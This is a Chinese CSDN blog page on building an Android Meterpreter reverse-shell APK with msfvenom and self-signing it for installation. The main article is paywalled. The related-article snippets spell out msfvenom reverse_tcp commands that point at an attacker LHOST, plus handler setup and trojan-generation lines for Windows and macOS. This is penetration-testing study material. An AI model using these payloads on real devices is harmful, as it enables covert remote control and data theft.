Android Hack---使用msfvenom之基础篇

最新推荐文章于 2024-07-03 18:58:43 发布
最新推荐文章于 2024-07-03 18:58:43 发布
阅读量7.6k 收藏 22
点赞数 2
分类专栏: metasploit Android 文章标签: 手机 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34841823/article/details/54575821
版权
本文介绍了如何使用msfvenom在Kali Linux上生成针对Android设备的Meterpreter反向payload,并详细讲解了自签名认证过程,包括创建密码库文件、使用jarsigner自签名以及通过zipalign验证。最后,展示了在Android设备上安装payload并成功获取shell的步骤,实现了远程控制。
摘要由CSDN通过智能技术生成

msfvenom的参数就不赘述了,具体可以看我使用msfvenom渗透win7的那一篇博文

攻击机器:kali linux 10.42.0.1

渗透机器:华为某款机子

开始渗透:

先用msfvenom生成一个安卓端的meterpreter的反向payload:

然后是对生成的apk进行自签名认证:

先生成一个密码库文件:

最低0.47元/天 解锁文章
TravisZeng
关注
  • 2
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSFVENOM_windows_payload_creator_V1.0:V1.0
05-03
MSFVENOM_windows_payload_creator_V1.0 V1.0 MSFVENOM Windows Payload Builder是一个简单的perl脚本,旨在简化创建可自定义的Windows可执行文件的任务。 该脚本使用Shikata_na_gai mfsvenon模块创建有效负载可执行文件。 前提条件: 1.Linux环境。 2.安装了METASPLOIT框架。 如果您在Kali Linux上运行它会更好。 安装说明 : 下载程序并提供可执行的permision,然后使用./PayloadCreator.pl运行,或者在没有givin permision的情况下运行perl PayloadCreator.pl *忽略info.pl
GitHack-master.rar
01-06
GitHack-master 是一个压缩包,很可能包含了一个名为 "GitHack" 的项目的源代码或工具集。这个项目可能专注于利用Git进行安全研究或者提供与Git相关的安全审计和防护工具。Git是世界上最流行的分布式版本控制系统,...
安卓Hacking Part 1: 应用组件攻防
weixin_43639443的博客
12-04 394
随着手机应用的快速增长,手机应用安全成为了目前安全界最热门的一个话题。在这文章中,我们来看一下怎样攻击安卓应用组件。 什么是安卓应用组件? 应用组件是组成安卓应用的关键部分。每个应用都是由一个或者多个组件组成,并且每个都是单独调用。这里主要分为4个主要的组件,介绍如下: Activity: 是一个应用程序组件,提供一个屏幕,用户可以用来交互为了完成某项任务(例如打电话,发短信等) Ser...
【木马生成工具】Msfvenom介绍及利用
最新发布
aheyor的博客
07-03 1032
msfvenom aMetasploitstandalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
安卓Hacking Part 2: Content Provider攻防
weixin_43639443的博客
12-04 266
在上一期中,我们讨论了攻击及加固Activity组件的方法,今天我们来看看所谓的”Content Provider Leakage”。 什么是Content Provider? 按照Google为Android设计的安全模型,应用的数据属于私有数据,故默认情况下,应用无法访问其他应用的私有数据。但当应用需要与其他应用共享数据时,Content Provider就扮演着应用间数据共享桥梁的角色。Co...
安卓Hacking Part 6:调试Android应用
weixin_43639443的博客
12-04 237
上一期中,我们介绍了如何用JDB调试Java应用,本期中我们将来学习如何用JDB来调试Android应用,如果某个Android应用是可以被调试的,我们就能在该应用的进程中注入并运行我们自己的代码。 背景介绍 未使本文更加有意思,我开发了一个简单的演示应用,只有一个按钮和一个输入框。 下载: http://yunpan.cn/cf3RVN5fRRC73 (提取码:8734) 运行截图如下: 点击...
安卓 Hacking Part 17 破解Android应用
succ
07-21 1806
 本文中,我们将会介绍一些基本的模拟器检测方法并在检测到模拟器时终止程序运行。然后我会介绍攻击者如何用一些免费的工具来绕过这些检测。本文的主要目标是演示攻击者如何通过修改应用来改变其功能。 逆向工程 计算机编程中,逆向工程是一种软件分析技术,用于识别和理解应用程序,通常是为了重新实现程序,或者是仿照程序,抑或是寻找程序弱点并攻击。 Android中进行许多攻击都要求能对应用进行逆向工程
Hack-Regular.ttf
05-17
Hack-Regular.ttf
hoverboard-firmware-hack-FOC:带有磁场定向控制(FOC)
05-03
Hoverboard-固件-hack-FOC 该存储库为股票悬浮滑板实现了面向现场的控制(FOC)。 与换向方法相比,这种新的FOC控制方法具有以下优异的性能: 减少噪音和振动平稳的扭矩输出并提高了电机效率。 因此,能耗更低弱磁场...
50 Android Hacks - Hack2
10-27
【50 Android Hacks - Hack2】是一份深入探讨Android平台优化和开发技巧的资源集合。这份资料旨在帮助开发者和爱好者提升他们的Android应用性能、安全性和用户体验。通过一系列精心挑选的"hack",读者可以了解到如何...
Hack-Backend
05-16
Node.JS模板快速启动Node.JS REST API的模板功能性惯用和可配置的日志记录响应压缩Sane棉绒和造型准则使用github动作进行持续集成测验代码覆盖率运行服务器npm start 注意:这将在开发环境中运行服务器。 有关将...
msfvenom获取shell
01-03
仅用于测试 msfvenom各平台生成木马大全: windows: msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b ‘x00x0axff’ -i 3 -f exe -opayload.exe mac: msfvenom -a x86 –platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.ma
android 日志泄露,安卓Hacking Part 4:非预期的信息泄露(边信道信息泄露)
weixin_39606575的博客
05-31 312
分享到:前几期中,我们讨论了与Activity,Content Provider ,Broadcast Receivers相关的攻防,在本期中,我们将会来讨论讨论非预期的信息泄露,也即我常常提到的所谓“边信道信息泄露”.何为非预期的信息泄露?当应用处理用户或其它数据源输入的数据时,可能会把数据放在不安全的位置,而这些数据能够被同一设备上其它的恶意应用读取,这就造成了风险。安全风险由于利用这样的边信...
[可用]android hack
weixin_34247155的博客
02-19 256
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.237 LPORT=4444 R > shell.apk service apache2 start mv shell.apk /var/www/html msfconsole use exploit/multi/handler set payload android/m...
50 Android hacks(hack 1)
wincehxd的博客
09-25 526
接触到一本涉及android编程技巧的书,叫做《50 Android Hacks》,作者:Carlos Sessa。然后从网上找了一下这本书的译本,居然发现没有免费中文版的,所以和技术群里的小伙伴们商量翻译一下,以飨程序猿。后来发现初衷虽好,但是路漫漫,每天下班的一点时间充斥着乱七八糟的事,所以就先以博客的形式,以单个技巧为单位发到博客上,最后再整理成完整的pdf。希望大家用的上。 在翻译中,我
50 Android Hacks(hack 2)
wincehxd的博客
09-25 409
接触到一本涉及android编程技巧的书,叫做《50 Android Hacks》,作者:Carlos Sessa。然后从网上找了一下这本书的译本,居然发现没有免费中文版的,所以和技术群里的小伙伴们商量翻译一下,以飨程序猿。后来发现初衷虽好,但是路漫漫,每天下班的一点时间充斥着乱七八糟的事,所以就先以博客的形式,以单个技巧为单位发到博客上,最后再整理成完整的pdf。希望大家用的上。 在翻译中
译作:《50 Android Hacks》中文版:《打造高质量Android应用:Android开发必知的50个诀窍》
allong
03-27 4572
本人译作《50 Android Hacks》中文书名《打造高质量Android应用:Android开发必知的50个诀窍》即将出版! 京东购书地址:http://item.jd.com/11431447.html 亚马逊购书地址:http://www.amazon.cn/%E6%89%93%E9%80%A0%E9%AB%98%E8%B4%A8%E9%87%8FAndroid%E5%BA%94%E
metasploit、msfvenom生成木马入侵电脑及手机
xj28555的博客
08-09 1552
简介 msfvenom msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件 查看所有--payload的模块 msfvenom -l payloads 文件后缀名-f的格式 msfvenom --help-formats metasploit Metasploit Framework(MSF)是一款开源安全漏洞
msfvenom常用参数
m0_61506558的博客
08-29 1545
列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。设定有效攻击荷载的最大长度生成payload的最大长度,就是文件大小。保护模板程序的动作,注入的payload作为一个新的进程运行。指定需要使用的encoder(编码器)编码免杀。指定需要使用的payload(攻击荷载)。...
hack-tools插件使用
08-14
根据提供的代码,这段代码是一个用于进行SYN洪水攻击的Python脚本。SYN洪水攻击是一种拒绝服务(DoS)攻击,通过发送大量的TCP SYN数据包来耗尽目标系统的资源,使其无法正常提供服务。 关于hack-tools插件的使用,根据提供的信息,无法确定具体指的是哪个插件。如果你想了解关于SYN洪水攻击的更多信息,以及如何防范此类攻击,可以参考网络安全相关的文档和教程。<span class="em">1</span> #### 引用[.reference_title] - *1* [HackTools————9、使用Scapy构造SYN泛洪攻击](https://blog.csdn.net/Fly_hps/article/details/79831799)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值